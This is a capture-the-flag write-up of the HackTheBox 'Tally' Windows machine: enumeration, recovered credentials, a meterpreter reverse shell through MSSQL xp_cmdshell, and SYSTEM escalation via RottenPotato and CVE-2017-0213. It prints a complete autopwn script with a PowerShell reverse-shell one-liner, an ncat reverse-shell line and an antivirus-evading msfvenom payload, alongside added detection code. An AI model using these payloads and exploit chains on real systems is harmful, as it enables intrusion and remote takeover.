Tally write-up

Analysis of Tally

Cybersecurity · hackthebox · windows

Enumeration

Port scanning

Let’s scan the full range of TCP ports using my tool htbscan.py (you can find it here: https://github.com/Alamot/code-snippets/blob/master/enum/htbscan.py):

$ sudo ./htbscan.py 10.10.10.59 300

Running command: sudo masscan -e tun0 -p0-65535 --max-rate 300 --interactive 10.10.10.59

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-05-03 12:04:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 49668/tcp on 10.10.10.59                                  
Discovered open port 80/tcp on 10.10.10.59                                     
Discovered open port 445/tcp on 10.10.10.59                                    
Discovered open port 32843/tcp on 10.10.10.59                                  
Discovered open port 49665/tcp on 10.10.10.59                                  
Discovered open port 1433/tcp on 10.10.10.59                                   
Discovered open port 135/tcp on 10.10.10.59                                    
Discovered open port 32844/tcp on 10.10.10.59                                  
Discovered open port 81/tcp on 10.10.10.59                                     
Discovered open port 49667/tcp on 10.10.10.59                                  
Discovered open port 32846/tcp on 10.10.10.59                                  
Discovered open port 49666/tcp on 10.10.10.59                                  
Discovered open port 49666/tcp on 10.10.10.59                                  
Discovered open port 47001/tcp on 10.10.10.59                                  
Discovered open port 15567/tcp on 10.10.10.59                                  
Discovered open port 49664/tcp on 10.10.10.59                                  
Discovered open port 139/tcp on 10.10.10.59                                    
Discovered open port 49670/tcp on 10.10.10.59                                  
                                                                             
Running command: sudo nmap -A -p80,81,135,139,445,1433,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49670 10.10.10.59

Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-03 15:11 EEST
Nmap scan report for 10.10.10.59
Host is up (0.12s latency).

PORT      STATE SERVICE              VERSION
80/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
81/tcp    open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds         Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s             Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2018-05-03T10:47:41
|_Not valid after:  2048-05-03T10:47:41
|_ssl-date: 2018-05-03T12:12:35+00:00; +3s from scanner time.
15567/tcp open  http                 Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
| http-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
32843/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp open  ssl/http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
|_ssl-date: 2018-05-03T12:12:37+00:00; +3s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
32846/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
47001/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc                Microsoft Windows RPC
49665/tcp open  msrpc                Microsoft Windows RPC
49666/tcp open  msrpc                Microsoft Windows RPC
49667/tcp open  msrpc                Microsoft Windows RPC
49668/tcp open  msrpc                Microsoft Windows RPC
49670/tcp open  msrpc                Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2018-05-03 15:12:36
|_  start_date: 2018-05-03 13:47:08
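The two-stage approach above (a fast masscan sweep, then nmap -A against only the discovered ports) needs the masscan output turned into a clean port list; note that masscan reported 49666 twice. The following is an added example, not the htbscan.py code from the repository linked above; the sample output is constructed from the scan shown here.

```python
import re
from typing import Iterable, List

# Constructed sample of masscan output, modelled on the scan above;
# port 49666 is deliberately listed twice, as it was in the real run.
SAMPLE_MASSCAN_OUTPUT = """\
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-05-03 12:04:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Discovered open port 49668/tcp on 10.10.10.59
Discovered open port 80/tcp on 10.10.10.59
Discovered open port 445/tcp on 10.10.10.59
Discovered open port 49666/tcp on 10.10.10.59
Discovered open port 49666/tcp on 10.10.10.59
Discovered open port 1433/tcp on 10.10.10.59
"""

DISCOVERED_RE = re.compile(
    r"^Discovered open port (?P<port>\d{1,5})/(?P<proto>tcp|udp) on (?P<host>\S+)$"
)


def parse_open_ports(lines: Iterable[str], host: str, proto: str = "tcp") -> List[int]:
    """Return the sorted, de-duplicated open ports masscan reported for host/proto.

    Lines that are not 'Discovered open port' records (banners, option echoes)
    are ignored, as are records for other hosts or the other protocol.
    """
    ports = set()
    for line in lines:
        m = DISCOVERED_RE.match(line.strip())
        if not m or m.group("host") != host or m.group("proto") != proto:
            continue
        port = int(m.group("port"))
        if 0 <= port <= 65535:
            ports.add(port)
    return sorted(ports)


def nmap_port_arg(ports: List[int]) -> str:
    """Build the comma-separated value nmap's -p option expects, e.g. '80,445,1433'."""
    return ",".join(str(p) for p in ports)


def build_nmap_command(masscan_output: str, host: str) -> List[str]:
    """Compose the follow-up service/version scan (as argv) from raw masscan output."""
    ports = parse_open_ports(masscan_output.splitlines(), host)
    if not ports:
        raise ValueError("masscan reported no open TCP ports for %s" % host)
    return ["nmap", "-A", "-p" + nmap_port_arg(ports), host]
```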

Brute forcing Microsoft SharePoint

We see that Microsoft SharePoint is on the box. Let’s download the SharePointURLBrute tool from here: https://www.bishopfox.com/resources/tools/sharepoint-hacking-diggity/attack-tools/

$ perl SharePointURLBrute\ v1.1.pl  -a http://10.10.10.59 -e SharePoint-UrlExtensions-18Mar2012.txt

Starting search for common SharePoint Pages
Start Time: Sun Nov  5 11:37:15 2017

FOUND: http://10.10.10.59/_catalogs/masterpage/Forms/AllItems.aspx
FOUND: http://10.10.10.59/_catalogs/wp/Forms/AllItems.aspx
FOUND: http://10.10.10.59/_layouts/AreaNavigationSettings.aspx
FOUND: http://10.10.10.59/_Layouts/AreaTemplateSettings.aspx
FOUND: http://10.10.10.59/_Layouts/AreaWelcomePage.aspx
FOUND: http://10.10.10.59/_Layouts/ChangeSiteMasterPage.aspx
FOUND: http://10.10.10.59/_layouts/MyInfo.aspx
FOUND: http://10.10.10.59/_layouts/MyPage.aspx
FOUND: http://10.10.10.59/_layouts/PageSettings.aspx
FOUND: http://10.10.10.59/_layouts/policy.aspx
FOUND: http://10.10.10.59/_layouts/policyconfig.aspx
FOUND: http://10.10.10.59/_layouts/policycts.aspx
FOUND: http://10.10.10.59/_layouts/Policylist.aspx
FOUND: http://10.10.10.59/_Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
FOUND: http://10.10.10.59/_layouts/SiteDirectorySettings.aspx
FOUND: http://10.10.10.59/_layouts/sitemanager.aspx
FOUND: http://10.10.10.59/_Layouts/SiteManager.aspx?lro=all
FOUND: http://10.10.10.59/_vti_bin/alerts.asmx
FOUND: http://10.10.10.59/_vti_bin/dspsts.asmx
FOUND: http://10.10.10.59/_vti_bin/forms.asmx
FOUND: http://10.10.10.59/_vti_bin/Lists.asmx
FOUND: http://10.10.10.59/_vti_bin/people.asmx
FOUND: http://10.10.10.59/_vti_bin/Permissions.asmx
FOUND: http://10.10.10.59/_vti_bin/search.asmx
FOUND: http://10.10.10.59/_vti_bin/UserGroup.asmx
FOUND: http://10.10.10.59/_vti_bin/versions.asmx
FOUND: http://10.10.10.59/_vti_bin/Views.asmx
FOUND: http://10.10.10.59/_vti_bin/webpartpages.asmx
FOUND: http://10.10.10.59/_vti_bin/webs.asmx
FOUND: http://10.10.10.59/_vti_bin/SharepointEmailWS.asmx
FOUND: http://10.10.10.59/_vti_bin/spsearch.asmx
FOUND: http://10.10.10.59/_vti_bin/WebPartPages.asmx
FOUND: http://10.10.10.59/default.aspx
FOUND: http://10.10.10.59/shared documents/forms/allitems.aspx

Getting FTP credentials

If we open http://10.10.10.59/shared%20documents/forms/allitems.aspx, we see a file named “ftp-details” modified by tally\administrator. Let’s download it and see what is inside:

FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in

Now we know the FTP password, but we lack the username. If we set a cookie named “mobile” equal to 1 (i.e. mobile=1) and reload the site, a gear appears at the top-right corner. Click on that gear, select “Site Contents” and then “Site Pages”. There we find an interesting link named “FinanceTeam.aspx” (again by tally\administrator). I originally found the gear by emulating a mobile device in my browser (using the developer tools, google it if you don’t know what I am talking about): when I reloaded the site, the gear appeared at the top-right corner.

Let’s visit that link:

http://10.10.10.59/_layouts/15/mobile/mblwikia.aspx?Url=%2FSitePages%2FFinanceTeam%2Easpx&Source=%2F_layouts%2F15%2Fmobile%2Fviewa%2Easpx%3FList%3D076fa50e%252Dcea0%252D431a%252Dad18%252Dd528cf893d4c%26View%3Dee7b270d%252D91a9%252D482d%252Db7f2%252Df905c4b15281

Migration update

Hi all,

Welcome to your new team page!

As always, there's still a few finishing touches to make.  Rahul - please upload the design mock ups to the Intranet folder as 'index.html' using the ftp_user account - I aim to review regularly.

We'll also add the fund and client account pages in due course.

Thanks – Sarah & Tim.

Therefore our FTP credentials are ftp_user:UTDRSCH53c"$6hys

Getting SMB credentials

Connect via FTP and have a look at /User/Tim/log/do to.txt:

To do:
Remove migration folder
Set secure share permissions
encrypted share creds:
password in keepass

Let’s download /User/Tim/Files/tim.kdbx and crack it:

keepass2john tim.kdbx > hash
john --format=KeePass --wordlist=/usr/share/dict/rockyou.txt hash
tim:simplementeyo

Now open tim.kdbx using KeePass (master password: simplementeyo):

$ keepass tim.kdbx

Go to Database -> WORK -> WINDOWS -> Shares. Here we find the SMB credentials Finance:Acc0unting (right-click the entry and choose copy password to get the password).

Getting MSSQL credentials

Let’s connect to SMB:

$ smbclient -U Finance \\\\10.10.10.59\\ACCT
or
$ sudo mount -t cifs //10.10.10.59/ACCT /mnt/TEMP -o user=Finance,password=Acc0unting,vers=2.0

Inside smb:\zz_Migration\Binaries\New Folder\tester.exe we find this connection string:

DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;

This means our MSSQL credentials are sa:GWE3V65#6KFH93@4GWTG2G

Getting shell

Let’s make a meterpreter payload using msfvenom. If we use the psh-reflection format, our payload evades the antivirus detection on the box:

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.105 LPORT=60000 -f psh-reflection -o msf.ps1

Don’t forget to set up your listener using exploit/multi/handler:

msf> use exploit/multi/handler
msf exploit(handler) > options

Module options (exploit/multi/handler):

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.105     yes       The listen address
   LPORT     60000            yes       The listen port

msf exploit(handler) > exploit
[*] Started reverse TCP handler on 127.0.0.1:6000

Now, upload msf.ps1 to /Intranet via FTP. We can execute our payload via MSSQL:

$ msfconsole
msf> use auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > set CMD "powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\Intranet\\msf.ps1"
msf auxiliary(mssql_exec) > info

Basic options:
  Name             Current Setting
  ----             ---------------
  CMD              powershell -ExecutionPolicy bypass -NoExit -File C:\FTP\Intranet\msf.ps1
  PASSWORD         GWE3V65#6KFH93@4GWTG2G
  RHOST            10.10.10.59
  RPORT            1433
  TDSENCRYPTION    false
  USERNAME         sa
  USE_WINDOWS_AUTH false

msf auxiliary(mssql_exec) > exploit

And here is our meterpreter shell:

meterpreter > sysinfo
Computer        : TALLY
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_GB
Domain          : HTB.LOCAL
Logged On Users : 7
Meterpreter     : x64/windows
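The shell above comes from the sa account enabling xp_cmdshell and having SQL Server launch PowerShell, so on the defending side the thing to watch for is sqlservr.exe spawning a shell, and the configuration change itself. The following is an added detection example, not part of the original write-up: the Sysmon-style process events and the SQL Server errorlog lines are constructed to mirror the chain used here, and the errorlog wording is assumed.

```python
import re
from typing import Dict, Iterable, List

# Constructed Sysmon Event ID 1 style records, modelled on what the
# xp_cmdshell -> cmd.exe -> powershell.exe chain above would produce.
SAMPLE_PROCESS_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL13.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell -ExecutionPolicy bypass -NoExit -File C:\FTP\Intranet\msf.ps1",
     "User": r"NT SERVICE\MSSQLSERVER"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy bypass -NoExit -File C:\FTP\Intranet\msf.ps1",
     "User": r"NT SERVICE\MSSQLSERVER"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe",
     "User": r"TALLY\Sarah"},
]

# Constructed SQL Server errorlog excerpt; the second line mirrors the message
# written when sp_configure turns xp_cmdshell on (wording assumed, not captured from Tally).
SAMPLE_ERRORLOG = """\
2018-05-03 15:30:01.12 spid55 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2018-05-03 15:30:01.15 spid55 Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2018-05-03 15:30:02.00 spid55 Using 'xpstar.dll' version '2016.130.1601' to execute extended stored procedure 'xp_cmdshell'.
"""

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# PowerShell switches that rarely appear in legitimate scheduled jobs: policy bypass,
# encoded commands, no profile, hidden window.
SUSPICIOUS_PS_FLAGS = re.compile(
    r"-(ExecutionPolicy\s+bypass|enc(odedcommand)?\b|nop\b|w(indowstyle)?\s+hidden)", re.I)
XP_CMDSHELL_ENABLED = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_sql_spawned_shells(events: Iterable[Dict[str, str]]) -> List[str]:
    """Flag shells whose parent is sqlservr.exe (the xp_cmdshell signature) and, one hop
    further down, PowerShell run with bypass-style flags under the SQL service account."""
    alerts = []
    for ev in events:
        child, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        if parent == "sqlservr.exe" and child in SHELLS:
            alerts.append("sqlservr.exe spawned %s as %s" % (child, ev["User"]))
        elif (child in ("powershell.exe", "pwsh.exe")
              and SUSPICIOUS_PS_FLAGS.search(ev["CommandLine"])
              and ev["User"].upper().startswith("NT SERVICE\\MSSQL")):
            alerts.append("PowerShell with bypass flags under SQL service account: %s"
                          % ev["CommandLine"])
    return alerts


def detect_xp_cmdshell_enabled(errorlog: str) -> List[str]:
    """Return the errorlog lines that record xp_cmdshell being switched on."""
    return [ln for ln in errorlog.splitlines() if XP_CMDSHELL_ENABLED.search(ln)]
```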

Privilege Escalation

Using Incognito and RottenPotato

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeAssignPrimaryTokenPrivilege
  SeChangeNotifyPrivilege
  SeCreateGlobalPrivilege
  SeImpersonatePrivilege
  SeIncreaseQuotaPrivilege
  SeIncreaseWorkingSetPrivilege


meterpreter > cd C:\\Users\\Sarah\\Desktop
meterpreter > upload rottenpotato.exe
[*] uploading  : rottenpotato.exe -> rottenpotato.exe
[*] uploaded   : rottenpotato.exe -> rottenpotato.exe


meterpreter > load incognito
Loading extension incognito...success.


meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
TALLY\Sarah

Impersonation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT


meterpreter > execute -Hc -f C:\\Users\\Sarah\\Desktop\\rottenpotato.exe
Process 7996 created.
Channel 2 created.


meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
TALLY\Sarah

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM
NT SERVICE\SQLSERVERAGENT


meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM


meterpreter > shell
Process 3452 created.
Channel 3 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\Sarah\Desktop> whoami
nt authority\system :D

Using CVE-2017-0213

We can also use CVE-2017-0213 for privilege escalation:

  1. Download the exploit source: https://github.com/WindowsExploits/Exploits/blob/master/CVE-2017-0213/Source/CVE-2017-0213.cpp

  2. Change the cmdline in CVE-2017-0213.cpp to run ncat or a powershell script to get a remote shell. E.g.:

    WCHAR cmdline[] = L"C:\\Users\\Sarah\\Desktop\\ncat.exe 10.10.14.190 60002 -e cmd.exe";
    or
    WCHAR cmdline[] = L"powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\Intranet\\shell.ps1";

  3. Compile it, upload it and copy it to a folder where the user has write permissions.

  4. Migrate your existing shell to another process (Important! Otherwise it doesn’t work.)

  5. Set up the listener on your side.

  6. Execute CVE-2017-213.exe

You can download my autopwn script (and the other required files) from here: https://github.com/Alamot/code-snippets/tree/master/hacking/HTB/Tally

(Don’t forget to set LHOST appropriately. If you are using a Linux OS, the script tries to automatically get the LHOST IP from the tun0 interface).

#!/usr/bin/env python2
# Author: Alamot
import sys
import uuid
import fcntl
import _mssql
import signal
import ftplib
from pwn import *
from subprocess import call
from base64 import b64encode
signal.signal(signal.SIGINT, signal.SIG_DFL)


def get_ip_address(ifname):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return socket.inet_ntoa(fcntl.ioctl(
        s.fileno(),
        0x8915,  # SIOCGIFADDR
        struct.pack('256s', ifname[:15].encode())
    )[20:24])


#LHOST = "10.10.15.247"
LHOST = get_ip_address('tun0')
LPORT1="60000"
LPORT2="60001"
LPORT3="60002"
FTP_SERVER = "10.10.10.59"
FTP_USERNAME = "ftp_user"
FTP_PASSWORD = "UTDRSCH53c\"$6hys"
FTP_UPLOADPATH = "Intranet"
MSSQL_SERVER = "10.10.10.59:1433"
MSSQL_USERNAME = "sa"
MSSQL_PASSWORD = "GWE3V65#6KFH93@4GWTG2G"
TIMEOUT = 60


def get_ps_payload(lhost, lport):
    # PowerShell reverse shell one-liner that connects back to lhost:lport
    return "$client = New-Object System.Net.Sockets.TCPClient('"+lhost+"',"+lport+"); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close();"

payload1 = get_ps_payload(LHOST, LPORT1)
payload2 = get_ps_payload(LHOST, LPORT2)
payload3 = get_ps_payload(LHOST, LPORT3)

def initiate():
    unique_filename1 = "msf1.ps1"
    unique_filename2 = "msf2.ps1"
    with open(unique_filename1,'wt') as f:
        f.write(payload1)
    with open(unique_filename2,'wt') as f:
        f.write(payload3)
        
    ftp = None
    try:
        ftp = ftplib.FTP(FTP_SERVER,FTP_USERNAME,FTP_PASSWORD)
        log.success("Successful login at ftp server "+FTP_SERVER+" with username '"+FTP_USERNAME+"' and password '"+FTP_PASSWORD+"'")
        log.info("Changing current working directory to " + FTP_UPLOADPATH)
        ftp.cwd('/'+FTP_UPLOADPATH)
        
        log.info("Uploading "+unique_filename1)
        with open(unique_filename1,'rb') as f:         
            ftp.storbinary('STOR '+unique_filename1, f)

        log.info("Uploading Invoke-PSInject.ps1")
        with open("Invoke-PSInject.ps1",'rb') as f:         
            ftp.storbinary("STOR Invoke-PSInject.ps1", f)
            
        log.info("Uploading "+unique_filename2)
        with open(unique_filename2,'rb') as f:         
            ftp.storbinary('STOR '+unique_filename2, f)
            
        log.info("Uploading cve2017213ps.exe")
        with open("cve2017213ps.exe",'rb') as f:         
            ftp.storbinary("STOR cve2017213ps.exe", f)

            
    except Exception as e:
        log.failure("FTP failed: "+str(e))
    finally:
        if ftp:
            ftp.quit()


    mssql = None
    try:
        mssql = _mssql.connect(server=MSSQL_SERVER, user=MSSQL_USERNAME, password=MSSQL_PASSWORD)
        log.success("Successful login at mssql server "+MSSQL_SERVER+" with username '"+MSSQL_USERNAME+"' and password '"+MSSQL_PASSWORD+"'")
        log.info("Enabling 'xp_cmdshell'")
        mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE -- ")
        mssql.execute_query("EXEC master..xp_cmdshell 'powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\"+FTP_UPLOADPATH+"\\"+unique_filename1+"'")
    except Exception as e:
        log.failure("MSSQL failed: "+str(e))
    finally:
        if mssql:
            mssql.close()


log.info("LHOST = "+LHOST)

try:
    threading.Thread(target=initiate).start()
except Exception as e:
    log.error(str(e))
    
ps1 = listen(LPORT1, timeout=TIMEOUT).wait_for_connection()
if ps1.sock is None:
    log.failure("Connection timeout.")
    sys.exit()
ps1.sendline("cd C:\\FTP\\"+FTP_UPLOADPATH+"\\")
ps1.sendline(". .\\Invoke-PSInject.ps1")
ps1.sendline("Invoke-PSInject -ProcName sihost -PoshCode "+b64encode(payload2.encode('UTF-16LE')))

ps2 = listen(LPORT2, timeout=TIMEOUT).wait_for_connection()
if ps2.sock is None:
    log.failure("Connection timeout.")
    sys.exit()
ps2.sendline("copy C:\\FTP\\"+FTP_UPLOADPATH+"\\cve2017213ps.exe C:\\TEMP\\cve2017213ps.exe")
ps2.sendline("cd C:\\TEMP\\")
ps2.sendline(". .\\cve2017213ps.exe")

ps3 = listen(LPORT3, timeout=TIMEOUT).wait_for_connection()
if ps3.sock is None:
    log.failure("Connection timeout.")
    sys.exit()
ps3.interactive()

sys.exit()

Here is the output:

[*] LHOST = 10.10.15.247
[+] Trying to bind to 0.0.0.0 on port 60000: Done
[+] Waiting for connections on 0.0.0.0:60000: Got connection from 10.10.10.59 on port 50143
[+] Successful login at ftp server 10.10.10.59 with username 'ftp_user' and password 'UTDRSCH53c"$6hys'
[*] Changing current working directory to Intranet
[*] Uploading msf1.ps1
[*] Uploading Invoke-PSInject.ps1
[*] Uploading msf2.ps1
[*] Uploading cve2017213ps.exe
[+] Successful login at mssql server 10.10.10.59:1433 with username 'sa' and password 'GWE3V65#6KFH93@4GWTG2G'
[*] Enabling 'xp_cmdshell'
[+] Trying to bind to 0.0.0.0 on port 60001: Done
[+] Waiting for connections on 0.0.0.0:60001: Got connection from 10.10.10.59 on port 50154
[+] Trying to bind to 0.0.0.0 on port 60002: Done
[+] Waiting for connections on 0.0.0.0:60002: Got connection from 10.10.10.59 on port 50161
[*] Switching to interactive mode
$ whoami
nt authority\system
PS C:\Windows\system32$

What about exploiting Firefox?

On the box, there is Firefox version 44.0.2 and a script automatically opens C:\FTP\Intranet\index.html every now and then:

C:\Users\Sarah\Desktop> type browser.bat
...
REM copy latest mockups to webroot
copy /Y C:\FTP\Intranet\index.html C:\inetpub\wwwroot\HRTJYKYRBSHYJ\index.html

REM browse file
start "" "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" "http://127.0.0.1:81/HRTJYKYRBSHYJ/index.html"
...

In theory, we could exploit it by uploading an evil index.html via the FTP.

$ searchsploit firefox 44.0.2 -w

Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution https://www.exploit-db.com/exploits/44294/

Unfortunately, I was not able to make it work. I even enabled RDP on the box and connected to check what was going on. The exploit page opens normally, but Firefox either crashes or doesn’t execute the payload properly.
